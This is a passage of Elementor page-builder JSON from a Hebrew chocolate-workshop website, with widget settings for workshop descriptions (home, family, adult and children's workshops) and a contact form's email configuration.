\\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 